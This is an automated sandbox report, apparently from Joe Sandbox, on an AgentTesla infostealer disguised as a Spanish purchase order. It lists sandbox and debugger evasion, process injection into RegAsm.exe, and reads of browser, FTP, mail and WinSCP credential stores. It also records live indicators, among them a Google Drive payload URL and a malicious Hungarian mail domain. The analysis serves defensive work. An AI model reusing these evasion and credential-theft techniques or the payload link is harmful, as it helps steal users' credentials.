Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\Orden de compra M244545.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Orden de compra M244545.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: RegAsm.exe, 0000000B.00000002.7349796457.0000000001380000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32USERPROFILE=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=13CKGFGBBMK4VEBD75_G0JXF9OB9J4HBN
Source: Orden de compra M244545.exe, 00000000.00000002.2743156286.0000000002210000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
Source: Orden de compra M244545.exe, 00000000.00000002.2743156286.0000000002210000.00000004.00000001.sdmp, RegAsm.exe, 0000000B.00000002.7349796457.0000000001380000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Orden de compra M244545.exe, 00000000.00000002.2741690189.00000000006A4000.00000004.00000020.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1844

Thread sleep time: -2767011611056431s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Window / User API: threadDelayed 9956

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_0104EA88 sgdt fword ptr [eax]

11_2_0104EA88

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\Orden de compra M244545.exe

System information queried: ModuleInformation

Jump to behavior

Source: Orden de compra M244545.exe, 00000000.00000002.2744858164.0000000004C29000.00000004.00000001.sdmp, RegAsm.exe, 0000000B.00000002.7356669436.0000000002E09000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: Orden de compra M244545.exe, 00000000.00000002.2744858164.0000000004C29000.00000004.00000001.sdmp, RegAsm.exe, 0000000B.00000002.7356669436.0000000002E09000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: RegAsm.exe, 0000000B.00000002.7356669436.0000000002E09000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: Orden de compra M244545.exe, 00000000.00000002.2744858164.0000000004C29000.00000004.00000001.sdmp, RegAsm.exe, 0000000B.00000002.7356669436.0000000002E09000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: Orden de compra M244545.exe, 00000000.00000002.2743156286.0000000002210000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll
Source: Orden de compra M244545.exe, 00000000.00000002.2744858164.0000000004C29000.00000004.00000001.sdmp, RegAsm.exe, 0000000B.00000002.7356669436.0000000002E09000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: Orden de compra M244545.exe, 00000000.00000002.2744858164.0000000004C29000.00000004.00000001.sdmp, RegAsm.exe, 0000000B.00000002.7356669436.0000000002E09000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: RegAsm.exe, 0000000B.00000002.7356669436.0000000002E09000.00000004.00000001.sdmp	Binary or memory string: vmicvss
Source: RegAsm.exe, 0000000B.00000002.7351446590.00000000014E8000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: Orden de compra M244545.exe, 00000000.00000002.2743156286.0000000002210000.00000004.00000001.sdmp, RegAsm.exe, 0000000B.00000002.7349796457.0000000001380000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: RegAsm.exe, 0000000B.00000002.7349796457.0000000001380000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32USERPROFILE=https://drive.google.com/uc?export=download&id=13CKgFgBbMK4vEbd75_G0jxF9OB9J4HBn
Source: Orden de compra M244545.exe, 00000000.00000002.2744858164.0000000004C29000.00000004.00000001.sdmp, RegAsm.exe, 0000000B.00000002.7356669436.0000000002E09000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: Orden de compra M244545.exe, 00000000.00000002.2744858164.0000000004C29000.00000004.00000001.sdmp, RegAsm.exe, 0000000B.00000002.7356669436.0000000002E09000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: Orden de compra M244545.exe, 00000000.00000002.2744858164.0000000004C29000.00000004.00000001.sdmp, RegAsm.exe, 0000000B.00000002.7356669436.0000000002E09000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: Orden de compra M244545.exe, 00000000.00000002.2741690189.00000000006A4000.00000004.00000020.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
Source: RegAsm.exe, 0000000B.00000002.7356669436.0000000002E09000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\Orden de compra M244545.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Orden de compra M244545.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_01046950 LdrInitializeThunk,

11_2_01046950

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\Orden de compra M244545.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1110000

Jump to behavior

Source: C:\Users\user\Desktop\Orden de compra M244545.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Orden de compra M244545.exe'

Jump to behavior

Source: RegAsm.exe, 0000000B.00000002.7355742426.00000000019B0000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000011.00000002.7350796203.00000231B3AF0000.00000002.00020000.sdmp	Binary or memory string: Program ManagerD
Source: RegAsm.exe, 0000000B.00000002.7355742426.00000000019B0000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000011.00000002.7350796203.00000231B3AF0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 0000000B.00000002.7355742426.00000000019B0000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000011.00000002.7350796203.00000231B3AF0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: RegAsm.exe, 0000000B.00000002.7355742426.00000000019B0000.00000002.00020000.sdmp, UserOOBEBroker.exe, 00000011.00000002.7350796203.00000231B3AF0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 0000000B.00000002.7365965262.000000001E201000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7080, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Source: Yara match	File source: 0000000B.00000002.7365965262.000000001E201000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7080, type: MEMORYSTR

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 0000000B.00000002.7365965262.000000001E201000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7080, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	DLL Side-Loading1	Process Injection112	Disable or Modify Tools1	OS Credential Dumping2	Security Software Discovery421	Remote Services	Email Collection1	Exfiltration Over Other Network Medium	Encrypted Channel21	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Virtualization/Sandbox Evasion351	Credentials in Registry1	Process Discovery2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection112	Security Account Manager	Virtualization/Sandbox Evasion351	SMB/Windows Admin Shares	Data from Local System2	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	DLL Side-Loading1	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol23	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery115	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
csavarcsapagyexpress.hu	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://schemas.microso	0%	Avira URL Cloud	safe
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	Avira URL Cloud	safe
https://sectigo.com/CPS0	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	Avira URL Cloud	safe
http://hDFEly.com	0%	Avira URL Cloud	safe
http://VrVJ1YhyzX7x.net	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
csavarcsapagyexpress.hu	185.111.89.226	true	true	0%, Virustotal, Browse	unknown
drive.google.com	172.217.168.46	true	false		high
googlehosted.l.googleusercontent.com	142.250.185.193	true	false		high
doc-14-9g-docs.googleusercontent.com	unknown	unknown	false		high
mail.csavarcsapagyexpress.hu	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://doc-14-9g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/6f93qthe57oar1vggbn97oksebnf1ht7/1634177700000/12448148553778765603/*/13CKgFgBbMK4vEbd75_G0jxF9OB9J4HBn?e=download	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.microso	UserOOBEBroker.exe, 00000011.00000002.7348570592.00000231B32F0000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://doc-14-9g-docs.googleusercontent.com/	RegAsm.exe, 0000000B.00000003.2713472213.0000000001574000.00000004.00000001.sdmp	false		high
http://127.0.0.1:HTTP/1.1	RegAsm.exe, 0000000B.00000002.7365965262.000000001E201000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://DynDns.comDynDNS	RegAsm.exe, 0000000B.00000002.7365965262.000000001E201000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	RegAsm.exe, 0000000B.00000002.7373463217.000000002042D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://doc-14-9g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/6f93qthe	RegAsm.exe, 0000000B.00000003.2718736619.00000000015BD000.00000004.00000001.sdmp, RegAsm.exe, 0000000B.00000002.7353219665.0000000001563000.00000004.00000020.sdmp, RegAsm.exe, 0000000B.00000003.2718804640.000000000156D000.00000004.00000001.sdmp, RegAsm.exe, 0000000B.00000002.7352998212.0000000001556000.00000004.00000020.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	RegAsm.exe, 0000000B.00000002.7365965262.000000001E201000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://doc-14-9g-docs.googleusercontent.com/My&	RegAsm.exe, 0000000B.00000002.7352395880.0000000001533000.00000004.00000020.sdmp	false		high
https://drive.google.com/	RegAsm.exe, 0000000B.00000002.7351446590.00000000014E8000.00000004.00000020.sdmp	false		high
http://hDFEly.com	RegAsm.exe, 0000000B.00000002.7365965262.000000001E201000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://VrVJ1YhyzX7x.net	RegAsm.exe, 0000000B.00000002.7367144013.000000001E30C000.00000004.00000001.sdmp, RegAsm.exe, 0000000B.00000003.3636304172.000000001CEC1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
172.217.168.46	drive.google.com	United States	15169	GOOGLEUS	false
142.250.185.193	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
185.111.89.226	csavarcsapagyexpress.hu	Hungary	51013	WEBSUPPORT-SRO-SK-ASSK	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	1655
Start date:	14.10.2021
Start time:	04:13:13
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Orden de compra M244545.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.spre.troj.spyw.evad.winEXE@5/1@3/3
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 98% Number of executed functions: 108 Number of non-executed functions: 8
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, backgroundTaskHost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 20.54.122.82, 20.199.120.85, 2.21.140.114, 20.82.210.154, 92.123.195.35, 92.123.195.73, 93.184.221.240, 20.199.120.182, 104.89.41.209 Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, e15275.g.akamaiedge.net, arc.msn.com, wu.azureedge.net, wns.notify.trafficmanager.net, wildcard.weather.microsoft.com.edgekey.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, wu.ec.azureedge.net, wu-shim.trafficmanager.net, tile-service.weather.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, wdcp.microsoft.com, wd-prod-cp.trafficmanager.net, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, wdcpalt.microsoft.com Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:15:58	API Interceptor	2681x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.111.89.226	Delivery note_241493.exe	Get hash	malicious	Browse
185.111.89.226	Delivery note_241493.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
WEBSUPPORT-SRO-SK-ASSK	Delivery note_241493.exe	Get hash	malicious	Browse	185.111.89.226
	Delivery note_241493.exe	Get hash	malicious	Browse	185.111.89.226
	M2021-D-074.exe	Get hash	malicious	Browse	37.9.175.26
	Purchase Order.exe	Get hash	malicious	Browse	185.111.90.24
	xAXTvjBdeI.exe	Get hash	malicious	Browse	185.111.89.170
	60rUtFJPFb.exe	Get hash	malicious	Browse	37.9.175.3
	H0f7r2Mx4O.exe	Get hash	malicious	Browse	185.111.89.170
	SHIPMENT DETAIL.xlsx	Get hash	malicious	Browse	37.9.175.9
	B6i30pLa8e.exe	Get hash	malicious	Browse	37.9.175.155
	O64Hou5qAF.exe	Get hash	malicious	Browse	185.111.89.170
	RFQ - 001.xlsx	Get hash	malicious	Browse	185.111.89.170
	e759c6e8_by_Libranalysis.exe	Get hash	malicious	Browse	185.111.89.170
	diagram-32303288.xlsm	Get hash	malicious	Browse	37.9.175.7
	diagram-32303288.xlsm	Get hash	malicious	Browse	37.9.175.7
	diagram-1381837747.xlsm	Get hash	malicious	Browse	37.9.175.7
	diagram-1381837747.xlsm	Get hash	malicious	Browse	37.9.175.7
	New Order Euro 550,600.exe	Get hash	malicious	Browse	37.9.175.133
	5PthEm83NG.exe	Get hash	malicious	Browse	185.111.89.170
	k7AgZOwF4S.exe	Get hash	malicious	Browse	185.111.89.170
	o52k2obPCG.exe	Get hash	malicious	Browse	185.111.89.170

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	Purchase Order PO-1000837 from LAW TRANSPORT.html	Get hash	malicious	Browse	172.217.168.46 142.250.185.193
	Maj PO.exe	Get hash	malicious	Browse	172.217.168.46 142.250.185.193
	Contract and PI of 1500W.exe	Get hash	malicious	Browse	172.217.168.46 142.250.185.193
	WireAdviceCopy.html	Get hash	malicious	Browse	172.217.168.46 142.250.185.193
	Wire_Confirmation-Copy.html	Get hash	malicious	Browse	172.217.168.46 142.250.185.193
	#Ud83d#Udcde-youse.guia-644-46204-282109.htm	Get hash	malicious	Browse	172.217.168.46 142.250.185.193
	zq8o6y1z60.dll	Get hash	malicious	Browse	172.217.168.46 142.250.185.193
	Original Shipment Doc Ref 2853801324189923,PDF.exe	Get hash	malicious	Browse	172.217.168.46 142.250.185.193
	Gsdqz.dll	Get hash	malicious	Browse	172.217.168.46 142.250.185.193
	HUTWMrDhov.dll	Get hash	malicious	Browse	172.217.168.46 142.250.185.193
	0q3K4qJqQT.exe	Get hash	malicious	Browse	172.217.168.46 142.250.185.193
	PEDIDO.exe	Get hash	malicious	Browse	172.217.168.46 142.250.185.193
	SecuriteInfo.com.Ransom.Stop.Z5.27157.exe	Get hash	malicious	Browse	172.217.168.46 142.250.185.193
	Jrsuarez-62643-5799-80-950985.HTM	Get hash	malicious	Browse	172.217.168.46 142.250.185.193
	Jrsuarez-62643-5799-80-950985.HTM	Get hash	malicious	Browse	172.217.168.46 142.250.185.193
	ZAM#U00d3WIENIE.exe	Get hash	malicious	Browse	172.217.168.46 142.250.185.193
	Jrsuarez-62643-5799-80-950985.HTM	Get hash	malicious	Browse	172.217.168.46 142.250.185.193
	Jrsuarez-62643-5799-80-950985.HTM	Get hash	malicious	Browse	172.217.168.46 142.250.185.193
	UZlg2Sq2pQ.exe	Get hash	malicious	Browse	172.217.168.46 142.250.185.193
	DOC 13102021.exe	Get hash	malicious	Browse	172.217.168.46 142.250.185.193

Dropped Files

No context

Created / dropped Files

\Device\ConDrv Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	30
Entropy (8bit):	3.964735178725505
Encrypted:	false
SSDEEP:	3:IBVFBWAGRHneyy:ITqAGRHner
MD5:	9F754B47B351EF0FC32527B541420595
SHA1:	006C66220B33E98C725B73495FE97B3291CE14D9
SHA-256:	0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
SHA-512:	C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	NordVPN directory not found!..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.7855993258224325
